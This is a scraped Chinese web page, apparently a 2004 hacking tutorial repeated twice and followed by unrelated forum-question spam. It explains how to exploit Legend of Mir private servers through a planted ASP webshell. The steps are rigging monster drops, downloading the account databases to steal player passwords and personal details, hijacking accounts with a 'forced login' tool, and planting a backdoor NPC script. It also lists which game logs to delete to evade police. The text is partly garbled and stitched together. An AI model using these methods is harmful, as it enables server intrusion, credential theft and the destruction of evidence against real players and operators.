&GM也当了&装备也刷了&最后该清理日志了&日志在D:\mirserver3\gamelog\logdatasrv\logbase&下是所有玩家的标志&&每十分钟一个记录&&打开他会出现&类似&1&0&0&5&0&333&333&枫无痕&屠龙&& &00:01:01&&&这个日志的意思是&枫无痕在地图0的坐标333&333制造了&屠龙&其中第4个数字是玩家使用物品的动作&7是仍物品&4是拣物品&&8是玩家之间的交易&9是买物品&10是卖物品&11是使用物品&5是死了后掉的物品&19是被杀&1是存物品&0是取物品&6是毁物品&5是制造物品&嘻嘻 这里我们用传奇私服GM命令修改器看他的D:\mirserver3\Mir200\M2server.exe的命令&文件下载到本地来看他制造物品是什么&这样可以制造个&武器是&255&道术255&魔法255&极品装备了&好多有用的命令哦&还有无敌&记得先要开&GM模式&才可以哦&&GM模式的命令也是用这个软件看&&他这里的GM模式改成了张祥模式&无敌竟然是&张祥无敌&&&看来GM的真名字叫张祥&嘻嘻&&
下面的是我兄弟&黑暗中的矩阵提供的&你们看看 一起分享,嘿嘿!如果你拿到了webshell以后,还是在mirserver\Mir200\Envir\adminlist.txt里面添加GM帐号的话,那不妨看看下文,相信你会有收获的,因为你的方法隐蔽性太底! 本文中所用到的所有方法,都可以在webshell下完成,无须提升权限,前提是:web服务器和传奇服务器在同一台计算机。因此必须先确定传奇服务和web服务是否为一台主机,我们只要在asp上输入命令netstat&-an查看它所开端口,经过查看后发现它开了这两个传奇服务端端口(图一),可以得出传奇服务也在这台主机上。这样就比较好办了,可以通过asp在它的硬盘里寻觅传奇目录 一般默认安装为:D:\mirserver\&下。找到了传奇的目录我们就可以开始编写传奇私服里的Rookit了,酷吧! 一、一切皆有可能--修改怪物暴率 &&&& &&&&你是否还在因为不知道好装备在哪里打,或者打了老是不爆而而烦恼呢?其实打打稻草人、挖挖洞蛆,也有好装备爆的,怎么不相信?那么一起来吧,我要告诉你的是:一切皆有可能! &&&&修改修改怪物爆东西几率,在mirserver/Mir200/Envir/MonItems&下,所有的怪物这里都有名字,好装备都设置在一些刷得很少,而且很难打的怪物,暴装备的几率一般为1/4000&,也就是说打4000个这种怪物才爆一样,这样有多难啊。我经过考虑后决定修改“洞蛆”,让所有的装备都在这里暴。因为洞蛆比较难找到,经验少,一般没有玩家会杀它,而且杀死后东西不会暴出来,必须要挖,有很高的隐蔽性(图二)。 &&&&但是这样还不够,我们做事要不留尾巴不然怎么叫传奇私服里的Rootkit。为了避免玩家不小心发现这个已经变成极品装备仓库的洞蛆,我们还要去一个地方设置一下。跟我来,在&mirserver/Mir200/Envir/MonGen.txt&这里可以设置怪物刷新时出现的坐标。本来有几个地方都会有洞蛆出现,现在我们把其它地方的洞蛆都取消,只设置在&半兽古墓&一个没有人来的地方并且调整刷新的范围为0,数量为1,时间为30分钟出一次(图三),这样就最大限度的避免了其他玩家与我们的极品装备仓库---洞蛆接触。嘿嘿,众乐乐,不如独乐乐! 二、盗你没商量--下载传奇数据库& &&&& &&&&看着别人身上的极品装备眼红吗?其实你也可以拥有的。完全不要盗号木马,我们可以在服务器上动点手脚,达到盗人于无形的目的! 传奇有两个数据库文件很重要, 一是:mirserver/Mud2/Logsrv/IdDB/Id.db,它记录了所有玩家注册时的密码、以及密码提示问题、答案、电话号码、生日,等很多信息。拿到这个文件,玩家可以说是任你宰杀了,特别是那些喜欢用一个密码的,惨不可言,QQ、油箱,等等都有可能被盗。所以说玩传奇私服是非常危险的,大家还是去玩盛大安全点。(各位大哥,不要拿鸡蛋扔我啊!) 二是:mirserver/Mud2/DBSrv200/FDB/Hum.DB,记录了所有玩家的人物名所对应的ID。 现在我们先把这两个数据库下载到本地,先用记事本打开Hum.DB,查找你要盗的那位玩家的人物名,不用和他商量了啦,嘿嘿! 在人物名后面紧跟着的就是玩家的ID,把找到的ID复制一下,然后打开Id.db,查找ID对应的玩家密码,ID后面紧跟着的就是密码了。 接着去登录传奇,如果他还是注册时候的密码,那你就可以下装备了。不过有时候也会遇到玩家修改过密码的情况,这个时候就要用到一个小工具:传奇强行登录器。使用前首先把文件复制到传奇目录下,打开传奇强行登录器按上面的提示填写(图四),在检测通过后点击登录。 先用自己的号上,到人物选择,到这里慢点,在开始处有2个框,细心点可以发现是自己的ID和人物名字,(图五)还犹豫什么,把ID人物名字替换成要黑的号。点开始,进去了吗?哈哈哈哈,下光装备,你也可以把GM的ID拿来玩,只是清理传奇日志的时候会多几项类容,但是GM命令里面有一条对上面介绍的修改怪物暴率刷装备的方法非常有用,可以重读怪物爆机文件,这样不用等传奇服务重起,我们修改的东西就可以生效。 三、我的地盘我做主--编写领装备NPC&& &&&&什么是NPC呢?它是Non-Player-Character(非玩家控制人物)的简写,也就是说其行为是& 由系统控制的,例如药店店里的老板,安全区的文明宣传员都是NPC。既然游戏是给玩家玩的,那为什么玩家不可以做主呢?不要别的,我们自己来写个领装备的ncp吧!先熟悉下主要的语言: ------------------------------------------------------------------------------------------- &&&&[@main]&这样的段落可以被goto&@main识别 &&&&#if&条件语句(#if&如果...) &&&&checknamelist&读取文件中的名单&(例如:checknamelist&chengyuan.txt) &&&&#say&结果语句(#say&接显示对话内容) &&&&&$USERname&&你的姓名 &&&&@exit&关闭窗口 &&&&give&赠与物品(例如:give&屠龙&1) ------------------------------------------------------------------------------------------- &&&&&怎么样,是不是比易语言还容易啊?并不像传说中那么高深。有了上面的知识,我们就可以自己写NPC了。 &&写NPC要达到的目的是别人点这个NPC的时候,只出一段提示,而我点的时候却可以领装备。那怎样实现呢?我们可以先把一个有自己人物名的txt文件放到服务器上,然后用checknamelist&语句来读取这个文件里面的人物名,设置只有这个人物才可以领取装备,其他玩家只有点@exit,哈哈!但是一定记得把txt文件和NPC一起放在mirserver/Mir200/Envir/Market_def/下。 &&&&要让其他玩家不怀疑,隐蔽性非常重要,最好是仿照传奇服务器上的版本信息来NPC来写,因为传奇私服服务端各有不同,大多是从网上下载来的,管理员自己都不是很清楚,其他玩家就更不用说了。我们再联系NPC放置的位置来巧妙的设置一下,比如放在比齐赌庄里面的NPC可以加入提示信息:赌庄正在装修,暂时停止开放!(光盘里有我写好的npc文件,大家看看迷惑性怎样?) &&&&NPC脚本写好后,必须在&mirserver/Mir200/Envir/MerChant.txt&里面设定调用我们写的NPC,另外这里还可以设置NPC的坐标、NPC的人物名称、数量、代码、刷新时间。可能大家不是很明白&代码&是什么意思,其实他就是npc的外形,屠夫、铁匠、老兵,等都有自己的外形特征,有胖有瘦千万不要张冠李戴了。另外在设置/Market_def/下的NPC文件名的时候特别要注意,正确的应该是MerChant.txt中的调用文件加上地图名,要是文件名对不上是不会调用的(图六)。 四、传奇日志的清理 &&&&说到这里大家一定很奇怪,传奇的日志也用得上清理吗?其实不然,传奇有一套非常完善的日志记录,甚至可以成为警察叔叔查获你的证据。去年我通过当时最流行的数据库漏洞,进了一台网站服务器,不想上面还开了传奇服务。我马上就给自己弄了一个GM号,但是没几天就让发现了,他们还在网站上警告了我,当时我并没有弄清楚他们怎么发现的,只是被他们的技术非惊呆了,因为我是在肉鸡进了HTTP代理再去的他的网站,IP照样被查到。但是现在看来应该是传奇日志出卖了我。下面我把这些让人心烦的日志都列出来,大家在办完事之后一定记得把脚印擦干净! ------------------------------------------------------------------------------------------- 1、mirserver/Gamelog/logdatasrv/log/base&&&&游戏中所有与物品有关记录、交易、拣取、甚至是什么怪物爆的、以及所出物品的坐标和编号&&& &&&&利用&修改怪物暴率&刷装备的这个地方要特别注意删除 2、mirserver/Mir200/conlog/&&&&&登录时的id、人物、在线时间、ip &&& &&&利用&下载传奇数据库&盗装备的小心了,这里可是记录了你的IP地址的 3、mirserver/Mir200/LOG/&&&&&&&&&&&&&&&&&&&&GM的所有操作 &&&上过GM号的朋友应该注意的地方,另外千万不要用GM给自己刷装备,因为就算你把这个的记录删了,在&传奇心意控制器&的窗口上还是可以看到你的操作 4、mirserver/Mud2/Logsrv/chrlog/&&&注册时的id&和密码、密码保护、以及修改过的密码 &&&下载传奇数据库后,如果得到的密码不对,请来这里查看
5、mirserver/Mud2/Logsrv/conlog年-月/&&&&&登录的帐号和IP &&这里同样是利用&下载传奇数据库&盗装备的要注意的地方 ------------------------------------------------------------------------------------------- &&&&看了上面的内容,是不是有一种掩不住的冲动,原来传奇私服可以这样玩,不要等了,自己去实验吧!发挥一下DIY的能力把上面的几种方法组合一下,我相信最完美的Rootkit就会在你手下诞生! 至于webshell的隐藏问题请看我的另一篇文章:美人计--图片asp木马。&
&1.领装备npc脚本 http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.rar&&& 2.传奇强行登录器 http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.exe 3.相关图片 http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.rar 此文写于2004.10月&, 四、传奇日志的清理 在网上没有见过,这类资料(至少我没有见过)呵呵!~~ 这也是大家没有注意的地方,小心警察叔叔啊&~~
(只显示最新5条。评论内容 只代表网友观点,与本站立场无关!)
* 游客填写
评论内容:
请遵守及中华人民共和国其他各项有关法律法规。
严禁发表危害国家安全、损害国家利 益、破坏民族团结、破坏国家宗教政策、破坏社会稳定、侮辱、诽谤、教唆、淫秽等内容 的评论 。
用户需对自己在使用本站服务过程中 的行为承担法律责任(直接或间接导致的)。
本站管理员有权保留或删除评论内容 。
评论内容只代表网友个人观点,与本网 站立场无关。
Copyright @ .COM Inc. All rights reserved. 华盟网 版权所有 华安普特提供网络带宽传奇私服里的Rootkit设置
传奇私服,让我欢喜,让我忧!自从看了十月Neeao同档(即:同买x档案),写的"最大的私服系统《武易传奇》漏洞的发现过程"我就心情沉重,手里拿着二十来个传奇私服的webshell,就是不知道怎么给自己弄点装备,作为一个传奇爱好者,世界上最大的痛苦莫过如此。
&&&就这样郁闷了几天才抽出时间来琢磨刷装备的办法,经过不断的收集资料,不断的实践,终于有所成绩。
找到了实用性和隐蔽性都非常高的刷装备办法,简直和linux里的Rootkit不分上下。现在把它写出来和大家一起分享,嘿嘿!如果你拿到了webshell以后,还是在mirserver\Mir200\Envir\adminlist.txt里面添加GM帐号的话,那不妨看看下文,相信你会有收获的,因为你的方法隐蔽性太底!
本文中所用到的所有方法,都可以在webshell下完成,无须提升权限,前提是:web服务器和传奇服务器在同一台计算机。因此必须先确定传奇服务和web服务是否为一台主机,我们只要在asp木马上输入命令netstat
-an查看它所开端口,经过查看后发现它开了这两个传奇服务端端口(图一),可以得出传奇服务也在这台主机上。这样就比较好办了,可以通过asp木马在它的硬盘里寻觅传奇目录
一般默认安装为:D:\mirserver\
下。找到了传奇的目录我们就可以开始编写传奇私服里的Rookit了,酷吧!
一、一切皆有可能--修改怪物暴率
&&&&你是否还在因为不知道好装备在哪里打,或者打了老是不爆而而烦恼呢?其实打打稻草人、挖挖洞蛆,也有好装备爆的,怎么不相信?那么一起来吧,我要告诉你的是:一切皆有可能!
&&&&修改修改怪物爆东西几率,在mirserver/Mir200/Envir/MonItems
下,所有的怪物这里都有名字,好装备都设置在一些刷得很少,而且很难打的怪物,暴装备的几率一般为1/4000
,也就是说打4000个这种怪物才爆一样,这样有多难啊。我经过考虑后决定修改"洞蛆",让所有的会员装备都在这里暴。因为洞蛆比较难找到,经验少,一般没有玩家会杀它,而且杀死后东西不会暴出来,必须要挖,有很高的隐蔽性(图二)。
&&&&但是这样还不够,我们做事要不留尾巴不然怎么叫传奇私服里的Rootkit。为了避免玩家不小心发现这个已经变成极品装备仓库的洞蛆,我们还要去一个地方设置一下。跟我来,在
mirserver/Mir200/Envir/MonGen.txt
这里可以设置怪物刷新时出现的坐标。本来有几个地方都会有洞蛆出现,现在我们把其它地方的洞蛆都取消,只设置在"半兽古墓"一个没有人来的地方并且调整刷新的范围为0,数量为1,时间为30分钟出一次(图三),这样就最大限度的避免了其他玩家与我们的极品装备仓库---洞蛆接触。嘿嘿,众乐乐,不如独乐乐!
二、盗你没商量--下载传奇数据库
&&&&看着别人身上的极品装备眼红吗?其实你也可以拥有的。完全不要盗号木马,我们可以在服务器上动点手脚,达到盗人于无形的目的!
传奇有两个数据库文件很重要,
一是:mirserver/Mud2/Logsrv/IdDB/Id.db,它记录了所有玩家注册时的密码、以及密码提示问题、答案、电话号码、生日,等很多信息。拿到这个文件,玩家可以说是任你宰杀了,特别是那些喜欢用一个密码的,惨不可言,QQ、油箱,等等都有可能被盗。所以说玩传奇私服是非常危险的,大家还是去玩盛大安全点。(各位大哥,不要拿鸡蛋扔我啊!)
二是:mirserver/Mud2/DBSrv200/FDB/Hum.DB,记录了所有玩家的人物名所对应的ID。
现在我们先把这两个数据库下载到本地,先用记事本打开Hum.DB,查找你要盗的那位玩家的人物名,不用和他商量了啦,嘿嘿!
在人物名后面紧跟着的就是玩家的ID,把找到的ID复制一下,然后打开Id.db,查找ID对应的玩家密码,ID后面紧跟着的就是密码了。
接着去登录传奇,如果他还是注册时候的密码,那你就可以下装备了。不过有时候也会遇到玩家修改过密码的情况,这个时候就要用到一个小工具:传奇强行登录器。使用前首先把文件复制到传奇目录下,打开传奇强行登录器按上面的提示填写(图四),在检测通过后点击登录。
先用自己的号上,到人物选择,到这里慢点,在开始处有2个框,细心点可以发现是自己的ID和人物名字,(图五)还犹豫什么,把ID人物名字替换成要黑的号。点开始,进去了吗?哈哈哈哈,下光装备,你也可以把GM的ID拿来玩,只是清理传奇日志的时候会多几项类容,但是GM命令里面有一条对上面介绍的修改怪物暴率刷装备的方法非常有用,可以重读怪物爆机文件,这样不用等传奇服务重起,我们修改的东西就可以生效。
三、我的地盘我做主--编写领装备NPC&&
&&&&什么是NPC呢?它是Non-Player-Character(非玩家控制人物)的简写,也就是说其行为是
由系统控制的,例如药店店里的老板,安全区的文明宣传员都是NPC。既然游戏是给玩家玩的,那为什么玩家不可以做主呢?不要别的,我们自己来写个领装备的ncp脚本吧!先熟悉下主要的脚本语言:
-------------------------------------------------------------------------------------------
&&&&[@main]
这样的段落可以被goto @main识别
条件语句(#if 如果...)
&&&&checknamelist
读取文件中的名单 (例如:checknamelist chengyuan.txt)
结果语句(#say 接显示对话内容)
&&&&&$USERname&
赠与物品(例如:give 屠龙 1)
-------------------------------------------------------------------------------------------
&&&&&怎么样,是不是比易语言还容易啊?并不像传说中那么高深。有了上面的脚本知识,我们就可以自己写NPC脚本了。
&&写NPC脚本要达到的目的是别人点这个NPC的时候,只出一段提示,而我点的时候却可以领装备。那怎样实现呢?我们可以先把一个有自己人物名的txt文件放到服务器上,然后用checknamelist
语句来读取这个文件里面的人物名,设置只有这个人物才可以领取装备,其他玩家只有点@exit,哈哈!但是一定记得把txt文件和NPC一起放在mirserver/Mir200/Envir/Market_def/下。
&&&&要让其他玩家不怀疑,隐蔽性非常重要,最好是仿照传奇服务器上的版本信息来NPC来写,因为传奇私服服务端各有不同,大多是从网上下载来的,管理员自己都不是很清楚,其他玩家就更不用说了。我们再联系NPC放置的位置来巧妙的设置一下,比如放在比齐赌庄里面的NPC可以加入提示信息:赌庄正在装修,暂时停止开放!(光盘里有我写好的npc文件,大家看看迷惑性怎样?)
&&&&NPC脚本写好后,必须在
mirserver/Mir200/Envir/MerChant.txt
里面设定调用我们写的NPC,另外这里还可以设置NPC的坐标、NPC的人物名称、数量、代码、刷新时间。可能大家不是很明白"代码"是什么意思,其实他就是npc的外形,屠夫、铁匠、老兵,等都有自己的外形特征,有胖有瘦千万不要张冠李戴了。另外在设置/Market_def/下的NPC文件名的时候特别要注意,正确的应该是MerChant.txt中的调用文件加上地图名,要是文件名对不上是不会调用的(图六)。
四、传奇日志的清理
&&&&说到这里大家一定很奇怪,传奇的日志也用得上清理吗?其实不然,传奇有一套非常完善的日志记录,甚至可以成为警察叔叔查获你的证据。去年我通过当时最流行的数据库注入漏洞,进了一台网站服务器,不想上面还开了传奇服务。我马上就给自己弄了一个GM号,但是没几天就让发现了,他们还在网站上警告了我,当时我并没有弄清楚他们怎么发现的,只是被他们的技术非惊呆了,因为我是在肉鸡进了HTTP代理再去的他的网站,IP照样被查到。但是现在看来应该是传奇日志出卖了我。下面我把这些让人心烦的日志都列出来,大家在办完事之后一定记得把脚印擦干净!
-------------------------------------------------------------------------------------------
1、mirserver/Gamelog/logdatasrv/log/base&&&&游戏中所有与物品有关记录、交易、拣取、甚至是什么怪物爆的、以及所出物品的坐标和编号&&&
&&&&利用"修改怪物暴率"刷装备的这个地方要特别注意删除
2、mirserver/Mir200/conlog/&&&&&登录时的id、人物、在线时间、ip
&&&利用"下载传奇数据库"盗装备的小心了,这里可是记录了你的IP地址的
3、mirserver/Mir200/LOG/&&&&&&&&&&&&&&&&&&&&GM的所有操作
&&&上过GM号的朋友应该注意的地方,另外千万不要用GM给自己刷装备,因为就算你把这个的记录删了,在"传奇心意控制器"的窗口上还是可以看到你的操作
4、mirserver/Mud2/Logsrv/chrlog/&&&注册时的id
和密码、密码保护、以及修改过的密码
&&&下载传奇数据库后,如果得到的密码不对,请来这里查看
5、mirserver/Mud2/Logsrv/conlog年-月/&&&&&登录的帐号和IP
&&这里同样是利用"下载传奇数据库"盗装备的要注意的地方
-------------------------------------------------------------------------------------------
&&&&看了上面的内容,是不是有一种掩不住的冲动,原来传奇私服可以这样玩,不要等了,自己去实验吧!发挥一下DIY的能力把上面的几种方法组合一下,我相信最完美的Rootkit就会在你手下诞生!
至于webshell的隐藏问题请看我的另一篇文章:美人计--图片asp木马。
1.领装备npc脚本
http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.rar&&&
2.传奇强行登录器
http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.exe
3.相关图片
http://www.jmdg.cn/ai099/3721/bbs/images/upfile/.rar
此文写于2004.10月 ,
四、传奇日志的清理
在网上没有见过,这类资料(至少我没有见过)呵呵!~~
这也是大家没有注意的地方,小心警察叔叔啊 ~~
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。}
我要回帖
更多推荐
- ·暴雨低温预警信号分为几级怎么分级?
- ·脸上长痤疮消除小妙招有痘痘是痤疮吗?
- ·正压风口图片的字母△P代表什么?
- ·1个单元格内多个数据,范围外的数据如何生成怎样在表格中的空白处打下划线线?
- ·苹果手机后壳多少钱14promax128G现在得多少钱?
- ·办月嫂公司需要什么手续我想办一个月嫂公
- ·不动产登记工资待遇局什么工资待遇?
- ·学完学做西点怎么样该怎么出去应聘呢?
- ·租赁户主改名要多少线
- ·年底了应酬多了,怎么让自己宿醉后还能好好上班
- ·现在做什么都有风险,思来想去最保险的工作
- ·事请帮忙,要换保姆,哪个家政公司好
- ·过什么问题,到哪个单位都当好救火队员,当好服务员
- ·怎么还有人觉得下周就是15低保
- ·想学开锁,这个行业怎么样
- ·新电脑玩不了单机游戏
- ·拳皇所有历代人物中,最好用的一个选手是不是八神庵
- ·直播抢到的砖石红包怎么提现
- ·今晚Lol小组赛的女主持露的是内裤还是安全裤
- ·宝石说的5A蓝宝石无烧是什么意思思
- ·传奇私服gom日志服务器怎么设置查看gom引擎显示装备来源交易,拣取等动作的记录
- ·偶用网易手游模拟器MuMu模拟器玩生死格斗手游的时候,感觉终极技能不是很会用,请问大神玩家终极技能怎么用
- ·跪求大神给个新天龙八部大神排行榜永恒经典游戏的号,跪求啊!!!!!!
- ·科技圣诞礼物有哪些奖励 海克斯科技稀有宝石圣诞礼物奖励
- ·比王者荣耀好玩的游戏游戏玩的人有几个
- ·qq飞车珞芙嘉人发饰婉容宛榕知音发饰永久价格 哪款好
- ·九阴真经五仙教二内二内血杀和传统血杀哪个厉害点
- ·龙王传说培养阵容怎么样培养 龙王传说培养阵容培养介绍
- ·原始人来了之疯狂游乐场抢你妹妹升级9级龙需要哪些材料
- ·这是哪一场格斗比赛赛?
- ·求大神推荐十大画质唯美仙侠网游好的手机网游,我记得可以点连击的一个游戏,忘记叫什么了,求各位大神告知名字
- ·微信扫一扫公测关闭QQ飞车什么时候公测
- ·DNFdnf不花一分钱的职业不花就可以起飞的职业说什么
- ·蕞近用网易MuMu模拟器的什么时候出ios模拟器,偶看到了生死格斗手游已经内测了,请问这款手游阵容怎么搭配呀?
- ·2月小红觉醒到2月恒金中医堂需要多少高级觉醒卡
- ·穿越火线怎么超级跳 就是cf生化金字塔塔最上面的那个大箱子 等各位大哥的教学
